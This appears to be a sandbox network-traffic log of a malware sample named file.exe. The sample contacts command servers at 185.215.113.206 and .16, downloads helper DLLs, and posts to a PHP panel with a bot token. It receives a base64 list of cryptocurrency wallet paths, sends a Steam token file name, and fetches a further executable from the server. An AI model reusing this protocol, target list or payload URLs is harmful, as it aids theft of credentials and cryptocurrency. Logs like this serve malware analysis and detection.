Dec 8, 2024 13:31:51.751907110 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:51 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Dec 8, 2024 13:31:52.818088055 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 8, 2024 13:31:53.269047976 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:53 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Dec 8, 2024 13:31:56.279134989 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 8, 2024 13:31:56.725368023 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:56 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Dec 8, 2024 13:31:57.524024963 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 8, 2024 13:31:57.975306988 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:57 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Dec 8, 2024 13:31:58.595876932 CET	202	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IDHIDBAEGIIIDHJKEGDB Host: 185.215.113.206 Content-Length: 947 Connection: Keep-Alive Cache-Control: no-cache
Dec 8, 2024 13:31:59.727690935 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:31:58 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 13:31:59.776815891 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFBFBGDBKJJKFIEHJDB Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 42 46 42 47 44 42 4b 4a 4a 4b 46 49 45 48 4a 44 42 2d 2d 0d 0a Data Ascii: ------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------DBFBFBGDBKJJKFIEHJDBContent-Disposition: form-data; name="message"wallets------DBFBFBGDBKJJKFIEHJDB--
Dec 8, 2024 13:32:00.226982117 CET	1236	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:00 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Dec 8, 2024 13:32:00.421875954 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGIJKEHCAKFCAKFHDAA Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 49 4a 4b 45 48 43 41 4b 46 43 41 4b 46 48 44 41 41 2d 2d 0d 0a Data Ascii: ------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------AEGIJKEHCAKFCAKFHDAAContent-Disposition: form-data; name="message"files------AEGIJKEHCAKFCAKFHDAA--
Dec 8, 2024 13:32:00.876014948 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 13:32:00.888439894 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HJJKFBGCFHCGDHIDAAEC Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 48 4a 4a 4b 46 42 47 43 46 48 43 47 44 48 49 44 41 41 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------HJJKFBGCFHCGDHIDAAECContent-Disposition: form-data; name="file"------HJJKFBGCFHCGDHIDAAEC--
Dec 8, 2024 13:32:01.832082033 CET	202	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 8, 2024 13:32:01.857449055 CET	474	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HDGIEBGHDAEBGDGCFIID Host: 185.215.113.206 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 62 35 32 62 37 34 31 35 66 36 66 37 62 64 30 61 36 35 34 30 37 61 35 39 66 65 34 35 37 31 63 65 62 35 34 33 38 61 64 38 63 39 31 64 65 63 38 66 36 66 33 38 63 35 39 30 66 62 37 37 62 66 33 37 35 33 33 32 36 33 39 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 48 44 47 49 45 42 47 48 44 41 45 42 47 44 47 43 46 49 49 44 2d 2d 0d 0a Data Ascii: ------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="token"3b52b7415f6f7bd0a65407a59fe4571ceb5438ad8c91dec8f6f38c590fb77bf375332639------HDGIEBGHDAEBGDGCFIIDContent-Disposition: form-data; name="message"ybncbhylepme------HDGIEBGHDAEBGDGCFIID--
Dec 8, 2024 13:32:02.310244083 CET	271	IN	HTTP/1.1 200 OK Date: Sun, 08 Dec 2024 12:32:02 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 68 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 61 48 52 30 63 44 6f 76 4c 7a 45 34 4e 53 34 79 4d 54 55 75 4d 54 45 7a 4c 6a 45 32 4c 32 31 70 62 6d 55 76 63 6d 46 75 5a 47 39 74 4c 6d 56 34 5a 58 77 77 66 44 42 38 55 33 52 68 63 6e 52 38 4e 58 77 3d Data Ascii: aHR0cDovLzE4NS4yMTUuMTEzLjE2L21pbmUvcmFuZG9tLmV4ZXwwfDB8U3RhcnR8NXw=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.6	49875	185.215.113.16	80	7368	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Dec 8, 2024 13:32:02.433943987 CET	80	OUT	GET /mine/random.exe HTTP/1.1 Host: 185.215.113.16 Cache-Control: no-cache
Dec 8, 2024 13:32:03.785520077 CET	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sun, 08 Dec 2024 12:32:03 GMT Content-Type: application/octet-stream Content-Length: 3191808 Last-Modified: Sun, 08 Dec 2024 12:23:11 GMT Connection: keep-alive ETag: "67558faf-30b400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 a7 bb 2d 49 e3 da 43 1a e3 da 43 1a e3 da 43 1a b8 b2 40 1b ed da 43 1a b8 b2 46 1b 42 da 43 1a 36 b7 47 1b f1 da 43 1a 36 b7 40 1b f5 da 43 1a 36 b7 46 1b 96 da 43 1a b8 b2 47 1b f7 da 43 1a b8 b2 42 1b f0 da 43 1a e3 da 42 1a 35 da 43 1a 78 b4 4a 1b e2 da 43 1a 78 b4 bc 1a e2 da 43 1a 78 b4 41 1b e2 da 43 1a 52 69 63 68 e3 da 43 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 9c 56 f0 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 ea 04 00 00 98 01 00 00 00 00 00 00 c0 30 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$-ICCC@CFBC6GC6@C6FCGCBCB5CxJCxCxACRichCPELVf0@00@Wk00 @.rsrc@.idata @akyzlcoy*)@zjlmqufv00@.taggant00"0@
Dec 8, 2024 13:32:03.785553932 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 13:32:03.785566092 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 13:32:03.785578966 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
Dec 8, 2024 13:32:03.785589933 CET	1236	IN	Data Raw: 9f 7a 62 ad a7 0f 9b c3 6e f3 5d 1b 70 fb 45 fd b7 3f ad a5 66 ba af ad 07 ba fa 40 bb 71 b9 25 3f 7f 62 ad a7 2f 9b c3 6e f3 7d 1b 70 fb 45 9d b8 3f ad a5 86 ba af ad 07 ba fa 40 bb 71 a1 25 4f 7f 62 ad a7 df 87 c3 6e f3 9d 1b 70 fb 45 bd bc 3f Data Ascii: zbn]pE?f@q%?b/n}pE?@q%ObnpE?@q%WbgnpE]?@qi%3bnpE}?@q%bnpE?@q%bnpE=?&@qu%bn= pE?
Dec 8, 2024 13:32:03.785646915 CET	1236	IN	Data Raw: 26 c6 af ad 07 ba fa 40 bb 71 a1 25 3b 7d 62 ad a7 37 9a c3 6e f3 3d 24 70 fb 45 dd 86 3f ad a5 46 c6 af ad 07 ba fa 40 bb 71 a1 25 03 7d 62 ad a7 ab 93 c3 6e f3 5d 24 70 fb 45 fd 86 3f ad a5 66 c5 af ad 07 ba fa 40 bb 71 a5 25 0b 7d 62 ad a7 af Data Ascii: &@q%;}b7n=$pE?F@q%}bn]$pE?f@q%}bn}$pE?@q%}bn$pE?@q%}bn$pE]?@q%}bn$pE}?@q%}bn$pE?@q%}bg
Dec 8, 2024 13:32:03.785661936 CET	1236	IN	Data Raw: 6e f3 fd c8 6f fb 45 1d 99 3f ad a5 06 c1 af ad 07 ba fa 40 bb 71 6d 25 1f 94 62 ad a7 07 88 c3 6e f3 1d c9 6f fb 45 3d 99 3f ad a5 26 c1 af ad 07 ba fa 40 bb 71 7d 25 e7 94 62 ad a7 db 93 c3 6e f3 3d c9 6f fb 45 dd 99 3f ad a5 46 c1 af ad 07 ba Data Ascii: noE?@qm%bnoE=?&@q}%bn=oE?F@q%bon]oE?f@q%b/n}oE?@q%GbWnoE?@q}%WbwnoE]?@qm%b;noE}?
Dec 8, 2024 13:32:03.785790920 CET	1236	IN	Data Raw: bb 71 af 25 a3 80 63 ad 9a c6 03 a8 72 73 0d b3 33 fb c5 34 a4 fc ad 26 b3 17 f1 40 bb d7 fa 40 bb 71 b9 a5 6e a9 af ad 1a ab d4 e8 6e 94 ad 04 2f ff 10 0d f4 3d ad a5 06 b0 af ad f5 bf a6 66 bb 73 7d b2 33 fb c5 e8 a3 fc ad d4 b5 d7 fa 40 bb 73 Data Ascii: q%crs34&@@qnn/=fs}3@s3s8Bs3q%JcRrs3&$brdosOcrs3L8&%Ycrd$crduHvvgacJp=fsxn=
Dec 8, 2024 13:32:03.785801888 CET	1236	IN	Data Raw: 47 0a b1 ad fd 58 a9 29 b3 13 e5 82 f2 fd 62 ad fd bd 91 40 11 f3 62 5f 70 fb 28 48 0c b9 a2 ad be d7 fa 40 bb d7 fa 40 bb d7 fa 40 bb 50 28 a1 09 92 de 7d 09 bb 3b c3 72 4b e4 82 c6 00 63 ad 14 16 f4 ac fd 40 a5 26 af ff 7d a5 bb 09 b1 ad f5 bf Data Ascii: GX)b@b_p(H@@@P(};rKc@&}By{n@@@P(@pb<hr@@@P(@'}SA@@@P(:fzTp6(rf-QBxp]pe(H Lhr@P(<
Dec 8, 2024 13:32:03.785813093 CET	1236	IN	Data Raw: bb d7 fa 40 bb d7 fa 40 bb 50 28 a1 00 92 62 81 04 92 52 85 09 4b 26 18 6b f3 67 15 70 fb 28 3d ba 3d bd ad 72 fb ad fe bc be 64 79 41 fb ad ad f5 bf a2 43 79 fb 3a 34 70 91 ae ec f2 bb 53 b4 5e d6 7f b7 fd d5 c6 7a 04 fc ad ca fd bd 4c fe 93 68 Data Ascii: @@P(bRK&kgp(==rdyACy:4pS^zLhr@P(i@~qrzLAs9Em<%G}c1rz)<#n@@@P(@(pKA@@@P(Cc%'jM(@@f~4
